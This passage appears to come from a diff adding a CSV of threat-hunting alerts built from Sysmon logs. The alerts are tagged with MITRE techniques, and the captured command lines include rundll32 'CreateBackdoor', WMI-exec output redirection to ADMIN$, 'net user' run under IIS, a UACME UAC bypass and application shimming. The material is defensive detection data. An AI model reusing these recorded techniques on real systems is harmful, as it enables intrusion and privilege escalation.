+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243562
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.488
+ 747F3D96-9F69-5E75-0000-00105B9A2000
+ 2028
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Detect IIS/Exchange Exploitation,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\cmd.exe) and commandline ( "c:\windows\system32\cmd.exe" /c net user ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1044
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-24 01:33:53.112
+ 365ABB72-4A01-5CE7-0000-0010EE9DAC00
+ 2404
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "c:\windows\system32\cmd.exe" /c net user
+ c:\windows\system32\inetsrv\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-45C7-5CE7-0000-002092F99C00
+ 0x9cf992
+ 0
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-49D6-5CE7-0000-001020A7A700
+ 2580
+ C:\Windows\System32\inetsrv\w3wp.exe
+ c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243562
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.488
+ 747F3D96-9F69-5E75-0000-00105B9A2000
+ 2028
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9827
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:32:51.246
+ 365ABB72-B0F3-5CC8-0000-0010B1361D00
+ 2504
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
+ C:\
+ IEWIN7\IEUser
+ 365ABB72-B0F2-5CC8-0000-00203D311D00
+ 0x1d313d
+ 0
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-B0C0-5CC8-0000-001017C31C00
+ 836
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\windows\system32\cmd.exe" /c net user ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1044
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-24 01:33:53.112
+ 365ABB72-4A01-5CE7-0000-0010EE9DAC00
+ 2404
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "c:\windows\system32\cmd.exe" /c net user
+ c:\windows\system32\inetsrv\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-45C7-5CE7-0000-002092F99C00
+ 0x9cf992
+ 0
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-49D6-5CE7-0000-001020A7A700
+ 2580
+ C:\Windows\System32\inetsrv\w3wp.exe
+ c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9827
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:32:51.246
+ 365ABB72-B0F3-5CC8-0000-0010B1361D00
+ 2504
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
+ C:\
+ IEWIN7\IEUser
+ 365ABB72-B0F2-5CC8-0000-00203D311D00
+ 0x1d313d
+ 0
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-B0C0-5CC8-0000-001017C31C00
+ 836
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9827
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:32:51.246
+ 365ABB72-B0F3-5CC8-0000-0010B1361D00
+ 2504
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
+ C:\
+ IEWIN7\IEUser
+ 365ABB72-B0F2-5CC8-0000-00203D311D00
+ 0x1d313d
+ 0
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-B0C0-5CC8-0000-001017C31C00
+ 836
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564911238.127145,2019-08-04T13:33:58.127145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe "C:\Windows\system32\osk.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5764
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-04 09:33:57.876
+ 747F3D96-A685-5D46-0000-00100D41D703
+ 3296
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\windows\system32\cmd.exe "C:\Windows\system32\osk.exe"
+ C:\Users\IEUser\Desktop\
+ MSEDGEWIN10\IEUser
+ 747F3D96-56A3-5D45-0000-0020FBD31800
+ 0x18d3fb
+ 1
+ Medium
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-A685-5D46-0000-00109B2AD703
+ 3916
+ C:\Users\IEUser\Desktop\UACME.exe
+ UACME.exe 55 c:\Windows\SysWOW64\notepad.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1618950781.944467,2021-04-21T00:33:01.944467+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 578500
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Suspicious NetCon
+ 2021-04-20 20:33:59.834
+ 747F3D96-04C3-607F-0000-0010F13B1E00
+ 2532
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+ tcp
+ true
+ false
+ 127.0.0.1
+ MSEDGEWIN10
+ 49925
+
+ false
+ 127.0.0.1
+ MSEDGEWIN10
+ 445
+ microsoft-ds
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9826
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:32:51.168
+ 365ABB72-B0F3-5CC8-0000-00105F321D00
+ 3840
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
+ C:\
+ IEWIN7\IEUser
+ 365ABB72-B0F2-5CC8-0000-00203D311D00
+ 0x1d313d
+ 0
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-B0C0-5CC8-0000-001017C31C00
+ 836
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9826
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:32:51.168
+ 365ABB72-B0F3-5CC8-0000-00105F321D00
+ 3840
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
+ C:\
+ IEWIN7\IEUser
+ 365ABB72-B0F2-5CC8-0000-00203D311D00
+ 0x1d313d
+ 0
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-B0C0-5CC8-0000-001017C31C00
+ 836
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9826
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:32:51.168
+ 365ABB72-B0F3-5CC8-0000-00105F321D00
+ 3840
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
+ C:\
+ IEWIN7\IEUser
+ 365ABB72-B0F2-5CC8-0000-00203D311D00
+ 0x1d313d
+ 0
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-B0C0-5CC8-0000-001017C31C00
+ 836
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028584.802196,2019-03-20T00:49:44.802196+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966408
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:49:44.712
+ 365ABB72-55E8-5C91-0000-001037DF0700
+ 4052
+ C:\Windows\System32\sdbinst.exe
+ 6.0.7600.16385 (win7_rtm.090713-1255)
+ Application Compatibility Database Installer
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB "
+ C:\Windows\System32\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
+ 365ABB72-551C-5C91-0000-001030590500
+ 2704
+ C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
+ "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+Command run remotely Using WMI,1607599134.733908,2020-12-10T15:18:54.733908+04:00,,Threat,Critical,User (NT AUTHORITY\LOCAL SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 549600
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-12-10 11:18:54.576
+ 747F3D96-041E-5FD2-0000-001024DF3B00
+ 5580
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ WMI Provider Host
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Wmiprvse.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+ C:\Windows\system32\
+ NT AUTHORITY\LOCAL SERVICE
+ 747F3D96-7E79-5FD2-0000-0020E5030000
+ 0x3e5
+ 0
+ System
+ SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B
+ 00000000-0000-0000-0000-000000000000
+ 832
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1618950781.944115,2021-04-21T00:33:01.944115+04:00,,Threat,Low,Found User (MSEDGEWIN10\user03) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\System32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 578499
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2021-04-20 20:33:00.318
+ 747F3D96-3A7C-607F-0000-001058067700
+ 2740
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ C:\Windows\System32\cmd.exe
+ C:\Windows\system32\
+ MSEDGEWIN10\user03
+ 747F3D96-3A7C-607F-0000-002075057700
+ 0x770575
+ 1
+ Medium
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-3A77-607F-0000-00105DD17600
+ 7280
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1579034691.122589,2020-01-15T00:44:51.122589+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 337
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:44:50.978
+ 747F3D96-2842-5E1E-0000-0010745E7A00
+ 1568
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "cmd.exe" /c notepad.exe
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-2842-5E1E-0000-0020FF3A7A00
+ 0x7a3aff
+ 0
+ High
+ SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-2842-5E1E-0000-00100C417A00
+ 4180
+ C:\Windows\System32\rundll32.exe
+ rundll32 url.dll,FileProtocolHandler ms-browser://
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556656513.168589,2019-05-01T00:35:13.168589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9833
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:35:12.340
+ 365ABB72-B180-5CC8-0000-00102BB71E00
+ 1504
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1
+ C:\windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-B17F-5CC8-0000-0020C6A31E00
+ 0x1ea3c6
+ 0
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-B17F-5CC8-0000-001082A51E00
+ 3572
+ C:\Windows\System32\mmc.exe
+ C:\Windows\system32\mmc.exe -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,FileProtocolHandler ms-browser://)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 336
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:44:50.348
+ 747F3D96-2842-5E1E-0000-00100C417A00
+ 4180
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 url.dll,FileProtocolHandler ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-2842-5E1E-0000-0020FF3A7A00
+ 0x7a3aff
+ 0
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-2842-5E1E-0000-0010903C7A00
+ 1628
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 336
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:44:50.348
+ 747F3D96-2842-5E1E-0000-00100C417A00
+ 4180
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 url.dll,FileProtocolHandler ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-2842-5E1E-0000-0020FF3A7A00
+ 0x7a3aff
+ 0
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-2842-5E1E-0000-0010903C7A00
+ 1628
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 336
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:44:50.348
+ 747F3D96-2842-5E1E-0000-00100C417A00
+ 4180
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
